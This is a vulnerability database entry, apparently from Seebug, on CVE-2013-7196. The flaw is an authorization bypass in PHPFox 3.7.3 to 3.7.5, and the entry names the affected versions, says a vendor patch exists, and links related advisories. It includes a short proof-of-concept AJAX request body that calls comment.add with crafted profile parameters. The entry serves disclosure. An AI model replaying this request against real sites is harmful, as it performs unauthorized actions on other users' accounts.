Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:62109
HistoryApr 10, 2014 - 12:00 a.m.

PHPFox访问控制安全限制绕过漏洞

2014-04-1000:00:00
Root
www.seebug.org
25

0.011 Low

EPSS

Percentile

83.0%

JSON

Bugtraq ID:66677
CVE ID:CVE-2013-7196

PHPFox是社交网络脚本。。

phpFox存在一个安全漏洞,允许攻击者利用漏洞绕过安全限制执行未授权操作。
0
PHPFox 3.7.3
PHPFox 3.7.4
PHPFox 3.7.5
目前厂商已经发布了升级补丁以修复漏洞,请下载使用:
www.phpfox.com


                                                &core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0 val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!& core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290

Related

prion 1
cve 1
securityvulns 2
packetstorm 1
prion
prion
Design/Logic Flaw
2014-04-18 22:14:00
cve
cve
CVE-2013-7196
2014-04-18 22:14:00
securityvulns
securityvulns
Vulnerability in PHPFox v3.7.3, v3.7.4 and v3.7.5 all build [ CVE-2013-7195, CVE-2013-7196 ]
2014-05-05 00:00:00
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
2014-05-05 00:00:00
packetstorm
packetstorm
PHPFox 3.7.5 Authorization Bypass
2014-04-05 00:00:00

0.011 Low

EPSS

Percentile

83.0%

JSON
Related for SSV:62109
prion1cve1securityvulns2packetstorm1